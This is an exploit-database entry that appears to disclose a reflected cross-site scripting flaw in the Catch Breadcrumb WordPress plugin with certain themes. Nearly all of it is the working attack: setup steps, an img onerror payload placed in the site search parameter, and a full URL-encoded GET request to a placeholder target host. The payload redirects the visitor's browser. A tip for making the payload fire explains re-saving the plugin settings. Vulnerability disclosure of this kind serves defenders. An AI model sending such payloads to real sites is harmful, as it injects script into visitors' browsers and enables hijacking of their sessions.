Share
## https://sploitus.com/exploit?id=WPEX-ID:10184
=== [ STEPS TO REPRODUCE ] =================================================
# 00 - Install & activate any of the affected themes;
# 01 - Download the Catch Breadcrumb plugin from https://downloads.wordpress.org/plugin/catch-breadcrumb.zip or install it directly from WordPress admin dashboard;
# 02 - Activate the plugin;
# 03 - Go to the website;
# 04 - Use your XSS payload in a search query, f.e.: /?s=<img src=x onerror=window.location=`https://profiles.wordpress.org/exmi/`;>


=== [ PROOF-OF-CONCEPT ] ===================================================
GET /?s=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fprofiles.wordpress.org%2Fexmi%2F%60%3B%3E HTTP/1.1
Host: target.com


Note: If the payload is not triggered (can happen if the plugin has been installed before the theme for example), then go to the plugin settings (/wp-admin/admin.php?page=catch-breadcrumb) and click on the 'Save Changes' button.